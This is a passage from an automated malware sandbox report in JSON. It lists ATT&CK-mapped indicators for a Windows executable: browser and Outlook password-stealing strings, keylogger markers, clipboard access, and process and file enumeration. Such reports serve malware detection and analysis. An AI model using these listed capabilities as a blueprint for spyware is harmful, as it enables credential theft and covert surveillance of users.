<IPv4> 443 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r PwnedNode YqYBWKLDAuPaeS16T1M59BMh5dk mlCF9Roau1lorgqFoUpueEdGMKM 2025-02-20 01:41:42 <IPv4> 7553 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r privacy4sa axgt75PIxSl0Sy/+LWclc3juvmg k3aesbm66QiX39Ag4DQbwncn8rk 2025-02-20 04:08:35 <IPv4> 443 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r Waeswynn eZ7PMy3soCxJ3iH/Ai9+Lb7Np3E hrRHQPqw/mb6r3bxvStJrx/wz5c 2025-02-20 02:41:08 <IPv4> 444 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r DerrickJensen 4AI6wUGAESov/wCoTGBJhiuz5sM kA8ItDojkSxe+Y2LkdAfr3zDJ+E 2025-02-20 02:29:37 <IPv4> 9001 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r kalunk ihaesjHRzPL4qXBfj3yYCKqjIlc rwMwcKZwfV8cf+J37wRiSqKw6Fk 2025-02-19 21:07:43 <IPv4> 9001 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r violin oGzaeSLiUiutN6q9tRvJU8xBvrg 8s5a5BQZ7BvFnQeeczVV5oXB3fU 2025-02-20 07:51:54 <IPv4> 443 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r tuxiHtz pniRhWyRTpmOgtl6TMwXOBrE5P4 P/HkSXH3LUH3dEsfwABtDFjsT4o 2025-02-20 04:07:48 <IPv4> 9001 0\" (Indicator: \"3des\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00D92000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"client: need a login/password\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"client: authentication error, maybe incorrect username/password\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"server [%d]: password too long\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"Getting Browser passwords\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"Getting Outlook passwords\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"get_outlook_password\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"Outlook: No password\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"get_outlook_passwords\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"rfbAuthProcessClientMessage: password check failed\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"password check failed!\" (Indicator: \"password\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"r puertasecreta 9PYFqiHEYzzLW427wc7uXFkMbc4 lbIfc6XpZkQWtGEjIS+3X2k0Vic 2025-02-20 01:02:51 <IPv4> 9001 0\" (Indicator: \"secret\"; Source: \"00000000-00001188.00000001.298674.034B0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-328", "type": 2, "relevance": 1, "name": "Contains ability to retrieve list of files and subdirectories", "description": "Found string \"Dir not exists: %s\" (Indicator: \"dir \"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"[TAB]\" (Indicator: \"[tab]\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"[DELETE]\" (Indicator: \"[Delete]\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"[BACKSPACE]\" (Indicator: \"[BACKSPACE]\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-224", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the local name for a socket (API string)", "description": "Found reference to API \"bor_getsockname_in\" (Indicator: \"getsockname\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"getsockname ip: err %d\" (Indicator: \"getsockname\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"NtQueryInformationProcess\" (Indicator: \"NtQueryInformationProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"NtQueryInformationProcess\" (Indicator: \"QueryInformationProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"Process32NextW\" (Indicator: \"Process32Next\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"Process32FirstW\" (Indicator: \"Process32First\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"VkKeyScanA\" (Indicator: \"VkKeyScan\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"MapVirtualKeyW\" (Indicator: \"MapVirtualKey\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegNotifyChangeKeyValue\" (Indicator: \"RegNotifyChangeKeyValue\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"CreateToolhelp32Snapshot\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"GetNativeSystemInfo\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"RtlGetVersion\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"FindFirstFileW\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"LdrGetProcedureAddress\" (Indicator: \"LdrGetProcedureAddress\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-122", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the NetBIOS name of the local computer (API string)", "description": "Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-131", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the specified system metric or system configuration setting (API string)", "description": "Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-188", "type": 2, "relevance": 1, "name": "Contains ability to access clipboard data (API string)", "description": "Found reference to API \"GetClipboardData\" (Indicator: \"GetClipboardData\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"OpenClipboard\" (Indicator: \"OpenClipboard\"; Source: 